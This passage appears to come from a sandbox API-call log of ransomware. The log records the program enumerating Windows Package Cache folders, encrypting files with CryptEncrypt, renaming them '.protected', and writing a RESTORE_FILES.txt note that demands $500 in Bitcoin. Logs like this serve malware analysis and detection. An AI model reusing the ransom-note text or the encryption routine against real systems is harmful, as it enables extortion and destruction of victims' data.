Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.protected") returned 99 [0076.968] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.protected" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.protected")) returned 1 [0076.968] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0076.968] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0076.969] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\RESTORE_FILES.txt") returned 89 [0076.969] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0077.092] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.092] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0077.093] lstrlenA (lpString="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") returned 684 [0077.093] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0077.093] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.093] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0077.093] CloseHandle (hObject=0xa4) returned 1 [0077.093] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.093] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="Windows") returned -1 [0077.093] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="Program Files") returned -1 [0077.093] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="Program Files (x86)") returned -1 [0077.093] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="$Recycle.bin") returned 1 [0077.093] lstrcmpiW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="System Volume Information") returned -1 [0077.093] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned 82 [0077.093] lstrcmpW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2=".") returned 1 [0077.093] lstrcmpW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="..") returned 1 [0077.093] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*") returned 84 [0077.093] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0077.094] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.094] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.094] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.094] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.094] lstrcmpiW (lpString1=".", 
lpString2="System Volume Information") returned -1 [0077.094] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\.") returned 84 [0077.094] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.094] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0077.094] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.094] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.094] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.094] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.094] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.094] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\..") returned 85 [0077.094] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.094] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0077.094] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0077.094] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0077.094] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0077.094] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0077.094] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0077.094] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned 91 [0077.094] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0077.094] lstrcmpW 
(lpString1="packages", lpString2="..") returned 1 [0077.095] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*") returned 93 [0077.095] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0077.095] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.095] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.095] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.095] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.095] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.095] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\.") returned 93 [0077.095] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.095] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0077.095] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.095] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.095] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.095] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.095] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.095] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\..") returned 94 [0077.096] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.096] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0077.096] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0077.096] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Windows") returned -1 [0077.096] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Program Files") returned 1 [0077.096] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Program Files (x86)") returned 1 [0077.096] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="$Recycle.bin") returned 1 [0077.096] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="System Volume Information") returned 1 [0077.096] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned 115 [0077.096] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0077.096] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0077.096] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*") returned 117 [0077.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0077.096] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.096] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.096] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.096] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.096] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.096] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\.") returned 117 [0077.096] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.097] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0077.097] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.097] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.097] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.097] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.097] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.097] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\..") returned 118 [0077.097] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.097] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.097] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0077.097] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0077.097] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0077.097] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0077.097] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0077.097] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0077.097] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0077.097] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0077.097] lstrcmpW (lpString1="cab1.cab", 
lpString2="RESTORE_FILES.txt") returned -1 [0077.097] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0077.097] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0077.097] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0077.097] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0077.097] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0077.097] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0077.097] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0077.097] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0077.097] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0077.098] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0077.254] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.254] WriteFile (in: 
hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0077.282] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.283] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0077.292] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0077.292] CloseHandle (hObject=0xd8) returned 1 [0077.293] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected") returned 134 [0077.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.protected")) returned 1 [0077.293] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0077.293] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Windows") returned -1 [0077.294] 
lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Program Files") returned 1 [0077.294] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Program Files (x86)") returned 1 [0077.294] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="$Recycle.bin") returned 1 [0077.294] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="System Volume Information") returned 1 [0077.294] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0077.294] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".protected") returned 0x0 [0077.294] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="RESTORE_FILES.txt") returned 1 [0077.294] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0077.294] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0077.294] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0077.294] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0077.294] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".txt") returned 0x0 
[0077.294] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0077.294] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".rar") returned 0x0 [0077.294] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0077.294] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".zip") returned 0x0 [0077.294] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0077.326] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.326] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0077.334] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.334] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0077.335] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0077.335] CloseHandle (hObject=0xd8) returned 1 [0077.335] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected") returned 154 [0077.335] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.protected")) returned 1 [0077.336] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0077.336] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0077.336] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 133 [0077.336] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0077.352] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.352] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0077.353] lstrlenA (lpString="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") returned 684 [0077.353] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0077.353] 
